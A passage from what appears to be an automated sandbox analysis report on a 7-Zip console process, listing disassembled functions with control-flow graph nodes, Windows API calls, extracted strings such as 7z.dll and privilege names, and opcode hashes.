                                                                                                                                                                                                • Executed
                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                control_flow_graph 2752 9470c8-9470e4 call 947d4c 2754 9470e9-9470ec 2752->2754 2755 9470ee-9470f0 2754->2755 2756 9470f9-947103 call 949d84 2754->2756 2755->2756 2757 9470f2-9470f4 2755->2757 2761 947105-947107 2756->2761 2762 94710c-947136 call 949ed8 call 943274 call 94376c 2756->2762 2759 947449-947458 2757->2759 2761->2759 2769 947138-947141 2762->2769 2770 94715b-947175 call 943314 2762->2770 2769->2770 2771 947143-947145 2769->2771 2777 94717a-947186 call 94a170 2770->2777 2773 947147 2771->2773 2774 94714c-947155 2771->2774 2776 9473f1-9473fe free 2773->2776 2774->2770 2776->2759 2780 947188-947195 CreateDirectoryW 2777->2780 2781 9471aa-9471ac 2777->2781 2782 947360-947364 2780->2782 2783 94719b-9471a4 GetLastError 2780->2783 2784 9471b2-9471d2 call 943208 call 94a7ec 2781->2784 2785 94727d-947286 GetLastError 2781->2785 2789 947366-947379 call 949ab0 2782->2789 2790 9473c9-9473e1 free * 2 2782->2790 2783->2781 2783->2785 2807 947273-947278 free 2784->2807 2808 9471d8-9471e7 CreateDirectoryW 2784->2808 2787 9472e4-9472ed GetLastError 2785->2787 2788 947288-9472b5 call 947d28 call 943208 call 947ebc 2785->2788 2794 9473e3-9473ee free 2787->2794 2795 9472f3-947301 call 94376c 2787->2795 2828 9472c6-9472db free 2788->2828 2829 9472b7-9472c4 free 2788->2829 2802 947381 2789->2802 2803 94737b-94737f 2789->2803 2790->2759 2794->2776 2805 947307-947309 2795->2805 2806 947432-947447 free * 2 2795->2806 2810 947385-9473a3 call 943460 call 946c84 2802->2810 2803->2810 2805->2806 2811 94730f-947316 2805->2811 2806->2759 2807->2785 2812 947356-94735b free 2808->2812 2813 9471ed-9471f6 GetLastError 2808->2813 2834 9473a5-9473a9 2810->2834 2835 9473ad-9473c4 free * 2 2810->2835 2817 94732c-947332 2811->2817 2818 947318-94731c 2811->2818 2812->2782 2819 947207-947230 call 947d28 call 943208 call 947ebc 2813->2819 2820 9471f8-947202 free 2813->2820 2825 947338-94733c 2817->2825 2826 947419-947430 free * 2 2817->2826 2823 947400-947417 free * 2 2818->2823 2824 947322-947326 2818->2824 2841 947232-94724a free * 2 2819->2841 2842 94724f-947271 free * 2 2819->2842 2820->2787 2823->2759 2824->2817 2824->2823 2825->2777 2831 947342-947351 2825->2831 2826->2759 2833 9472e0-9472e2 2828->2833 2829->2787 2831->2777 2833->2782 2833->2787 2834->2789 2837 9473ab 2834->2837 2835->2759 2837->2790 2841->2787 2842->2833
                                                                                                                                                                                                APIs
                                                                                                                                                                                                  • Part of subcall function 00947D4C: GetFileAttributesW.KERNELBASE ref: 00947D6E
                                                                                                                                                                                                  • Part of subcall function 00947D4C: GetFileAttributesW.KERNEL32 ref: 00947DA5
                                                                                                                                                                                                  • Part of subcall function 00947D4C: free.MSVCRT ref: 00947DB2
                                                                                                                                                                                                • free.MSVCRT ref: 009473F6
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001B.00000002.2646412783.0000000000941000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00940000, based on PE: true
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646353354.0000000000940000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646526575.000000000098F000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646593172.00000000009AC000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646641269.00000000009AF000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_27_2_940000_7z.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: AttributesFilefree
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 1936811914-0
                                                                                                                                                                                                • Opcode ID: 2b197326d930c81739ce0310d85795b3f658fd51b37e5abb9d2da20ad921631d
                                                                                                                                                                                                • Instruction ID: f071e6470d43b45fda8bd6b5aa130b6f8f4a46380537193a81ff32731d7f3460
                                                                                                                                                                                                • Opcode Fuzzy Hash: 2b197326d930c81739ce0310d85795b3f658fd51b37e5abb9d2da20ad921631d
                                                                                                                                                                                                • Instruction Fuzzy Hash: 4881A42221C58982CA34EFA1E451F6EE361FBC6784F445522FB9E83A69DF3CC945DB00
                                                                                                                                                                                                Function 00947EBC Relevance: 37.2, APIs: 18, Strings: 3, Instructions: 418COMMON
                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                • Executed
                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                control_flow_graph 2843 947ebc-947ee3 call 949b68 2846 947ee9-947f26 call 94339c call 949ce4 2843->2846 2847 947fca-947fd6 call 949ddc 2843->2847 2859 947f8c-947fa4 call 9491dc 2846->2859 2860 947f28-947f2c 2846->2860 2853 948253-94828a call 949d0c call 949b30 2847->2853 2854 947fdc-947fe4 2847->2854 2873 948306-94830b 2853->2873 2874 94828c-948294 2853->2874 2854->2853 2857 947fea-94800c call 943274 * 2 2854->2857 2876 94800e-948017 2857->2876 2877 94801b-948020 2857->2877 2871 947fa6 2859->2871 2872 947fa8-947fac 2859->2872 2860->2859 2865 947f2e-947f77 call 94abb0 2860->2865 2865->2859 2884 947f79-947f87 2865->2884 2878 947fb9-947fc5 call 9489d8 2871->2878 2879 947fb6 2872->2879 2880 947fae-947fb3 2872->2880 2881 94830d-948312 2873->2881 2882 948318-94831c 2873->2882 2874->2873 2883 948296-9482a5 call 947d4c 2874->2883 2876->2877 2886 948040-94804c call 943670 2877->2886 2887 948022-94803e call 942880 2877->2887 2885 948519-948524 2878->2885 2879->2878 2880->2879 2881->2882 2889 9484f2-948500 call 947978 2881->2889 2890 948377-948381 call 949c80 2882->2890 2891 94831e-948330 call 947d4c 2882->2891 2883->2889 2901 9482ab-9482b2 2883->2901 2884->2885 2904 948051-948062 call 949ce4 2886->2904 2887->2886 2887->2904 2902 948505-948506 2889->2902 2890->2889 2906 948387-948396 2890->2906 2891->2889 2910 948336-94833d 2891->2910 2901->2889 2907 9482b8-9482eb call 94339c 2901->2907 2908 948509-948511 call 94794c 2902->2908 2919 948064-948067 2904->2919 2920 9480b1-9480bb call 947ebc 2904->2920 2906->2889 2911 94839c-9483a6 call 949ab0 2906->2911 2922 9482fc-948301 2907->2922 2923 9482ed-9482f8 2907->2923 2918 948516 2908->2918 2910->2889 2915 948343-948372 2910->2915 2911->2889 2929 9483ac-9483c2 call 943274 2911->2929 2915->2908 2918->2885 2925 948075-9480a3 2919->2925 2926 948069-94806c 2919->2926 2928 9480c1-948108 call 943314 call 943208 call 947ce0 2920->2928 2934 94823e-94824e free * 2 2920->2934 2922->2908 2923->2922 2927 9480a5-9480af call 943404 2925->2927 2925->2928 2926->2920 2931 94806e-948073 2926->2931 2927->2928 2955 94815a-948185 free * 2 call 94794c free 2928->2955 2956 94810a-948111 2928->2956 2939 9483c4-9483ce call 942fec 2929->2939 2940 9483d2-9483f2 2929->2940 2931->2920 2931->2925 2934->2853 2939->2940 2944 9483f4-9483fe call 942fec 2940->2944 2945 948402-948437 call 947978 2940->2945 2944->2945 2953 948484-94849d call 947d4c 2945->2953 2954 948439-948457 wcscmp 2945->2954 2970 9484b3-9484f0 call 94339c free 2953->2970 2971 94849f-9484a1 2953->2971 2957 94847c 2954->2957 2958 948459-948477 call 94339c free 2954->2958 2972 94822d-948239 free 2955->2972 2961 948113-948124 call 942748 2956->2961 2962 94818a-9481c1 SetLastError free * 2 call 94794c free 2956->2962 2957->2953 2958->2908 2974 9481c3-9481ca 2961->2974 2975 94812a-948158 free call 943208 call 947ce0 2961->2975 2962->2972 2970->2908 2976 9484a7-9484b1 free 2971->2976 2977 9484a3-9484a5 2971->2977 2972->2885 2980 9481e0-94822a call 94362c free * 2 call 94794c free 2974->2980 2981 9481cc-9481d1 2974->2981 2975->2955 2975->2956 2976->2889 2977->2970 2977->2976 2980->2972 2981->2980 2985 9481d3-9481dc 2981->2985 2985->2980
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • free.MSVCRT ref: 0094812F
                                                                                                                                                                                                • free.MSVCRT ref: 0094816A
                                                                                                                                                                                                • free.MSVCRT ref: 0094817F
                                                                                                                                                                                                • free.MSVCRT ref: 00948232
                                                                                                                                                                                                  • Part of subcall function 0094ABB0: GetModuleHandleW.KERNEL32 ref: 0094ABD1
                                                                                                                                                                                                  • Part of subcall function 0094ABB0: GetProcAddress.KERNEL32 ref: 0094ABE1
                                                                                                                                                                                                  • Part of subcall function 0094ABB0: GetDiskFreeSpaceW.KERNEL32 ref: 0094AC32
                                                                                                                                                                                                • SetLastError.KERNEL32 ref: 0094818F
                                                                                                                                                                                                • free.MSVCRT ref: 0094819B
                                                                                                                                                                                                • free.MSVCRT ref: 009481A6
                                                                                                                                                                                                • free.MSVCRT ref: 009481BB
                                                                                                                                                                                                • free.MSVCRT ref: 00948243
                                                                                                                                                                                                • free.MSVCRT ref: 0094824E
                                                                                                                                                                                                • free.MSVCRT ref: 0094815F
                                                                                                                                                                                                  • Part of subcall function 0094339C: free.MSVCRT ref: 009433D7
                                                                                                                                                                                                  • Part of subcall function 0094339C: memmove.MSVCRT(00000000,?,?,00000000,009410A8), ref: 009433F2
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001B.00000002.2646412783.0000000000941000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00940000, based on PE: true
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646353354.0000000000940000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646526575.000000000098F000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646593172.00000000009AC000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646641269.00000000009AF000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_27_2_940000_7z.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: free$AddressDiskErrorFreeHandleLastModuleProcSpacememmove
                                                                                                                                                                                                • String ID: :$:$DATA$\
                                                                                                                                                                                                • API String ID: 4130059181-1004618218
                                                                                                                                                                                                • Opcode ID: 7d47eded2622c94f0ddccb54c994b41fb8cf36bc1bcc716852e6415c4a0d71d6
                                                                                                                                                                                                • Instruction ID: d46842e10b762e67ecdb231b45183e26cd51ab134f0566528c79ec762d394138
                                                                                                                                                                                                • Opcode Fuzzy Hash: 7d47eded2622c94f0ddccb54c994b41fb8cf36bc1bcc716852e6415c4a0d71d6
                                                                                                                                                                                                • Instruction Fuzzy Hash: F102B473509680D6CB20DF29D490A6EB770F7D9790F808226E79E47B68DF38C5A9CB04
                                                                                                                                                                                                Function 00983E84 Relevance: 31.7, APIs: 12, Strings: 6, Instructions: 227COMMON
                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                • Executed
                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                control_flow_graph 2991 983e84-983eb5 2992 9841e8 2991->2992 2993 983ebb 2991->2993 2994 9841ea-9841fd 2992->2994 2995 983ebe-983efa fputs call 982e24 2993->2995 2998 983efc-983f03 2995->2998 2999 983f51-983f59 2995->2999 3000 983f1f-983f4c call 943274 call 9830cc free 2998->3000 3001 983f05-983f1d fputs call 942300 2998->3001 3002 983f5b-983f62 2999->3002 3003 983f64-983f6f 2999->3003 3000->2999 3001->2999 3006 983f73-983f9e call 982e24 call 983148 3002->3006 3003->3006 3015 983fa0-983fce fputs * 2 call 942640 call 942300 3006->3015 3016 983fd3-983fe3 call 983034 3006->3016 3015->3016 3020 983fe8-983fea 3016->3020 3020->2994 3022 983ff0-983ff7 3020->3022 3023 983ff9-984027 fputs * 2 call 9426a0 call 942300 3022->3023 3024 98402c-98403c 3022->3024 3023->3024 3024->2994 3028 984042-984048 3024->3028 3030 98404a-984079 3028->3030 3031 9840af-9840b9 3028->3031 3036 9841b9 3030->3036 3037 98407f-984096 call 983034 3030->3037 3032 98419d-9841b1 3031->3032 3033 9840bf-9840e0 fputs 3031->3033 3032->2995 3035 9841b7 3032->3035 3033->3032 3041 9840e6-9840fc 3033->3041 3035->2992 3040 9841bd-9841ca SysFreeString 3036->3040 3044 9841bb 3037->3044 3045 98409c-9840ad SysFreeString 3037->3045 3040->2994 3041->3032 3043 984102-984133 3041->3043 3047 984139-984162 3043->3047 3048 9841cc 3043->3048 3044->3040 3045->3030 3045->3031 3051 9841ce-9841d8 call 94ae2c 3047->3051 3052 984164-984197 call 982ecc call 94ae2c SysFreeString 3047->3052 3049 9841d9-9841e6 SysFreeString 3048->3049 3049->2994 3051->3049 3052->3032 3052->3043
                                                                                                                                                                                                APIs
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001B.00000002.2646412783.0000000000941000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00940000, based on PE: true
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646353354.0000000000940000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646526575.000000000098F000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646593172.00000000009AC000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646641269.00000000009AF000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_27_2_940000_7z.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: fputs$FreeString$fputcfree
                                                                                                                                                                                                • String ID: = $--$----$Path$Type$Warning: The archive is open with offset
                                                                                                                                                                                                • API String ID: 2701146716-1919703766
                                                                                                                                                                                                • Opcode ID: 98949995720aafeada5ab4e649821211fbe2246f847a42084f07584e6b56428e
                                                                                                                                                                                                • Instruction ID: 814bea89a41d11fb1bfa3c2ccdfea274765df1f408c24003a03c55fd9702a760
                                                                                                                                                                                                • Opcode Fuzzy Hash: 98949995720aafeada5ab4e649821211fbe2246f847a42084f07584e6b56428e
                                                                                                                                                                                                • Instruction Fuzzy Hash: B3914A36218A8682DB10EF26E95476E7370FB95FC8F41A126EF5A47B29DF38C945C700
                                                                                                                                                                                                Function 0094F71C Relevance: 30.0, APIs: 11, Strings: 6, Instructions: 218COMMON
                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                • Executed
                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                control_flow_graph 3059 94f71c-94f74e call 941610 3062 94f774-94f7c2 _isatty * 3 3059->3062 3063 94f750-94f773 call 9602a0 _CxxThrowException 3059->3063 3065 94f7d4 3062->3065 3066 94f7c4-94f7c8 3062->3066 3063->3062 3069 94f7d9-94f81c 3065->3069 3066->3065 3068 94f7ca-94f7ce 3066->3068 3068->3065 3070 94f7d0-94f7d2 3068->3070 3071 94f81e-94f822 3069->3071 3072 94f82a 3069->3072 3070->3069 3071->3072 3073 94f824-94f828 3071->3073 3074 94f830-94f834 3072->3074 3073->3072 3073->3074 3075 94f836 3074->3075 3076 94f83c-94f846 3074->3076 3075->3076 3077 94f854-94f85e 3076->3077 3078 94f848-94f84e 3076->3078 3079 94f860-94f866 3077->3079 3080 94f86c-94f876 3077->3080 3078->3077 3079->3080 3081 94f884-94f88e 3080->3081 3082 94f878-94f87e 3080->3082 3083 94f890-94f89d 3081->3083 3084 94f8f3-94f8fd 3081->3084 3082->3081 3087 94f89f-94f8a9 3083->3087 3088 94f8ab-94f8be call 94ed34 3083->3088 3085 94f8ff-94f917 3084->3085 3086 94f91a-94f931 call 94ac74 * 2 3084->3086 3085->3086 3096 94f936-94f940 3086->3096 3087->3084 3094 94f8e6-94f8ed 3088->3094 3095 94f8c0-94f8e5 call 9602a0 _CxxThrowException 3088->3095 3094->3084 3095->3094 3098 94f946-94f95c 3096->3098 3099 94f9dd-94f9e7 3096->3099 3101 94f965-94f977 wcscmp 3098->3101 3102 94f95e-94f963 3098->3102 3103 94fa94-94fa9c 3099->3103 3104 94f9ed-94f9fa 3099->3104 3105 94f9bb-94f9c2 call 94ad0c 3101->3105 3106 94f979-94f98c call 94ed34 3101->3106 3102->3105 3104->3103 3107 94fa00-94fa1c call 942bc8 call 942d34 3104->3107 3105->3099 3114 94f9c4-94f9d7 call 98d4c0 call 94ac74 3105->3114 3115 94f9b4 3106->3115 3116 94f98e-94f9b3 call 9602a0 _CxxThrowException 3106->3116 3121 94fa1e-94fa3b call 943f78 3107->3121 3122 94fa4f-94fa74 call 9602a0 _CxxThrowException 3107->3122 3114->3099 3115->3105 3116->3115 3131 94fa3d-94fa46 3121->3131 3132 94fa49-94fa4d 3121->3132 3133 94fa75-94fa8f GetCurrentProcess SetProcessAffinityMask free 3122->3133 3131->3132 3132->3122 3132->3133 3133->3103
                                                                                                                                                                                                APIs
                                                                                                                                                                                                Strings
                                                                                                                                                                                                • Unsupported switch postfix for -slp, xrefs: 0094F991
                                                                                                                                                                                                • SeRestorePrivilege, xrefs: 0094F91C
                                                                                                                                                                                                • SeLockMemoryPrivilege, xrefs: 0094F9CB
                                                                                                                                                                                                • Unsupported switch postfix -bb, xrefs: 0094F8C3
                                                                                                                                                                                                • SeCreateSymbolicLinkPrivilege, xrefs: 0094F92A
                                                                                                                                                                                                • Unsupported switch postfix -stm, xrefs: 0094FA52
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001B.00000002.2646412783.0000000000941000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00940000, based on PE: true
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646353354.0000000000940000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646526575.000000000098F000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646593172.00000000009AC000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646641269.00000000009AF000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_27_2_940000_7z.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: ExceptionThrowfree$_isatty$Process$AffinityCurrentMaskwcscmp
                                                                                                                                                                                                • String ID: SeCreateSymbolicLinkPrivilege$SeLockMemoryPrivilege$SeRestorePrivilege$Unsupported switch postfix -bb$Unsupported switch postfix -stm$Unsupported switch postfix for -slp
                                                                                                                                                                                                • API String ID: 1961088698-2328792591
                                                                                                                                                                                                • Opcode ID: c2f4b7cbffa4da8aa62650c82c274732c1406b7f11731e234dbbf7887eb3a42e
                                                                                                                                                                                                • Instruction ID: 98cc6bdbb7f7cea0171e05d67f41c2ec9e8702a8e96be593e9acb00a2ae7258b
                                                                                                                                                                                                • Opcode Fuzzy Hash: c2f4b7cbffa4da8aa62650c82c274732c1406b7f11731e234dbbf7887eb3a42e
                                                                                                                                                                                                • Instruction Fuzzy Hash: 46A1A073608BC58AEB11DF25E4A079D3B60F796B84F988176DB8D47726DF28C985C301
                                                                                                                                                                                                Function 0098A448 Relevance: 29.9, APIs: 15, Strings: 2, Instructions: 145COMMON
                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                • Executed
                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                control_flow_graph 3134 98a448-98a455 3135 98a49c-98a4a4 3134->3135 3136 98a457-98a45f 3134->3136 3137 98a4f4 3135->3137 3138 98a4a6-98a4a9 3135->3138 3136->3135 3139 98a461-98a495 call 942300 fputs call 9426a0 call 942300 3136->3139 3142 98a4fc-98a50a 3137->3142 3140 98a4ab-98a4da call 942300 fputs call 9426a0 call 942300 3138->3140 3141 98a4df-98a4e5 3138->3141 3139->3135 3140->3141 3141->3142 3145 98a50c 3142->3145 3146 98a53d-98a559 free 3142->3146 3151 98a510-98a526 3145->3151 3148 98a55b 3146->3148 3149 98a58c-98a5b5 free 3146->3149 3153 98a55f-98a575 3148->3153 3162 98a5c5-98a5c8 3149->3162 3163 98a5b7-98a5be 3149->3163 3156 98a538-98a53b 3151->3156 3157 98a528-98a533 free * 2 3151->3157 3159 98a587-98a58a 3153->3159 3160 98a577-98a582 free * 2 3153->3160 3156->3146 3156->3151 3157->3156 3159->3149 3159->3153 3160->3159 3167 98a5ca-98a5e6 _CxxThrowException 3162->3167 3168 98a5e7-98a603 free 3162->3168 3163->3162 3165 98a5c0 3163->3165 3170 98a5c0 call 9866a8 3165->3170 3167->3168 3171 98a605 3168->3171 3172 98a626-98a637 free call 96a13c 3168->3172 3170->3162 3173 98a609-98a624 free 3171->3173 3175 98a63c-98a675 call 987080 call 94182c call 987f50 3172->3175 3173->3172 3173->3173 3182 98a6a8-98a6c9 free 3175->3182 3183 98a677 3175->3183 3184 98a67b-98a691 3183->3184 3186 98a6a3-98a6a6 3184->3186 3187 98a693-98a69e free * 2 3184->3187 3186->3182 3186->3184 3187->3186
                                                                                                                                                                                                APIs
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001B.00000002.2646412783.0000000000941000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00940000, based on PE: true
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646353354.0000000000940000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646526575.000000000098F000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646593172.00000000009AC000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646641269.00000000009AF000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_27_2_940000_7z.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: free$fputs$ExceptionThrowfputc
                                                                                                                                                                                                • String ID: Errors: $Warnings:
                                                                                                                                                                                                • API String ID: 437615013-2345102087
                                                                                                                                                                                                • Opcode ID: b879da1ccfc066a1247b5c29666ac93705d06d21a2897076d20723f3459c7b25
                                                                                                                                                                                                • Instruction ID: 5201d845a692681d4c6c58f6a7e9183c322878dc0753a0fe2deadd1671458028
                                                                                                                                                                                                • Opcode Fuzzy Hash: b879da1ccfc066a1247b5c29666ac93705d06d21a2897076d20723f3459c7b25
                                                                                                                                                                                                • Instruction Fuzzy Hash: C651B7623189C081D930FF25F8917ADA3A1FBC6B90F885513EA9D17769DF38C8C68742
                                                                                                                                                                                                Function 009683C8 Relevance: 27.2, APIs: 13, Strings: 5, Instructions: 152COMMON
                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                • Executed
                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                control_flow_graph 3188 9683c8-96841d call 946570 call 9431c0 call 948624 3195 968482 3188->3195 3196 96841f-96844c call 9431c0 call 9486dc 3188->3196 3197 968485-968489 3195->3197 3196->3195 3208 96844e-96847b call 9431c0 call 9486dc 3196->3208 3199 96848b-968498 free 3197->3199 3200 968499-96849d 3197->3200 3199->3200 3202 96849f-9684ac free 3200->3202 3203 9684ad-9684b1 3200->3203 3202->3203 3205 9684b3-9684b8 free 3203->3205 3206 9684bd-9684c0 3203->3206 3205->3206 3209 9684c6-9684ee call 943208 call 968290 3206->3209 3210 9685ef-968607 call 943314 free 3206->3210 3208->3195 3224 96847d-968480 3208->3224 3222 9684f0-968516 call 943314 free * 2 3209->3222 3223 96851b-968538 call 968290 3209->3223 3219 96860a-968611 3210->3219 3222->3219 3229 968565-96857b call 968290 3223->3229 3230 96853a-968560 call 943314 free * 2 3223->3230 3224->3197 3235 9685a5-9685bb call 968290 3229->3235 3236 96857d-9685a3 call 943314 free * 2 3229->3236 3230->3219 3241 9685e5-9685ea free 3235->3241 3242 9685bd-9685e3 call 943314 free * 2 3235->3242 3236->3219 3241->3210 3242->3219
                                                                                                                                                                                                APIs
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001B.00000002.2646412783.0000000000941000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00940000, based on PE: true
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646353354.0000000000940000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646526575.000000000098F000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646593172.00000000009AC000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646641269.00000000009AF000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_27_2_940000_7z.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: free$memmove
                                                                                                                                                                                                • String ID: 7z.dll$Codecs$Formats$Path$Path64
                                                                                                                                                                                                • API String ID: 1534225298-3804457719
                                                                                                                                                                                                • Opcode ID: 83274c2b3d544992283108eb9c5b7aa940d95cecb85798d2266b0b7fa0fa9ebc
                                                                                                                                                                                                • Instruction ID: 64d35ed5c371cc423546ae9c9f1b635191c2c4e78f0e908f732139b8ba184bd2
                                                                                                                                                                                                • Opcode Fuzzy Hash: 83274c2b3d544992283108eb9c5b7aa940d95cecb85798d2266b0b7fa0fa9ebc
                                                                                                                                                                                                • Instruction Fuzzy Hash: 6451A86220864590DE20EF25E451BAF6760EBC67E4F941252BE5E577BACF3CC687C700
                                                                                                                                                                                                Function 0096AB74 Relevance: 24.8, APIs: 10, Strings: 4, Instructions: 268libraryloaderCOMMON
                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                • Executed
                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                control_flow_graph 3245 96ab74-96aba4 3246 96aba6 3245->3246 3247 96abd3-96abf5 3245->3247 3248 96abaa-96abbc 3246->3248 3249 96ae31-96ae78 call 9683c8 call 9431c0 call 96a7fc free 3247->3249 3250 96abfb 3247->3250 3251 96abce-96abd1 3248->3251 3252 96abbe-96abc9 call 9694a8 free 3248->3252 3267 96ae7f-96ae87 3249->3267 3268 96ae7a 3249->3268 3253 96ac02-96acba call 943208 call 943518 call 943208 * 2 3250->3253 3251->3247 3251->3248 3252->3251 3277 96acc6-96accd 3253->3277 3278 96acbc-96acc1 call 943518 3253->3278 3272 96ae99-96aeca call 9431c0 call 96a9fc free 3267->3272 3273 96ae89-96ae94 call 94339c 3267->3273 3271 96af7a-96af99 free 3268->3271 3288 96aed1-96aeee call 9431c0 call 96a9fc 3272->3288 3289 96aecc 3272->3289 3273->3272 3281 96accf-96acd4 call 943518 3277->3281 3282 96acd9-96ad35 call 969d98 free * 2 3277->3282 3278->3277 3281->3282 3290 96ad37-96ad4c call 96a034 3282->3290 3291 96ad51-96ad61 call 942130 3282->3291 3301 96aef3-96af02 free 3288->3301 3289->3271 3302 96addd-96adf2 call 942130 3290->3302 3299 96ad63-96ad6a 3291->3299 3300 96ad6c 3291->3300 3304 96ad6f-96ad8b call 94b8f0 3299->3304 3300->3304 3305 96af06-96af10 3301->3305 3306 96af04 3301->3306 3311 96adf4-96ae01 call 969af0 3302->3311 3312 96ae03 3302->3312 3317 96adbd-96adc0 3304->3317 3318 96ad8d-96ad93 3304->3318 3309 96af12-96af16 3305->3309 3310 96af18-96af1b 3305->3310 3306->3271 3314 96af2a-96af2e 3309->3314 3310->3314 3315 96af1d-96af24 3310->3315 3319 96ae06-96ae2b call 94b8f0 call 9694a8 3311->3319 3312->3319 3321 96af77 3314->3321 3322 96af30-96af36 3314->3322 3315->3314 3320 96af26 3315->3320 3328 96adc2-96add3 memmove 3317->3328 3329 96adda 3317->3329 3324 96ad95-96ad9a free 3318->3324 3325 96ada1-96adac 3318->3325 3319->3249 3319->3253 3320->3314 3321->3271 3322->3321 3327 96af38 3322->3327 3324->3325 3330 96add5-96add8 3325->3330 3331 96adae-96adb9 call 942130 3325->3331 3333 96af3b-96af5a GetProcAddress 3327->3333 3328->3302 3329->3302 3330->3302 3331->3317 3336 96af66-96af6f 3333->3336 3337 96af5c-96af64 3333->3337 3336->3333 3340 96af71 3336->3340 3337->3336 3342 96af73-96af75 3337->3342 3340->3321 3342->3271
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • free.MSVCRT ref: 0096ABC9
                                                                                                                                                                                                • free.MSVCRT ref: 0096ACF3
                                                                                                                                                                                                • free.MSVCRT ref: 0096ACFE
                                                                                                                                                                                                • free.MSVCRT ref: 0096AD95
                                                                                                                                                                                                • memmove.MSVCRT(?), ref: 0096ADCB
                                                                                                                                                                                                • free.MSVCRT ref: 0096AE70
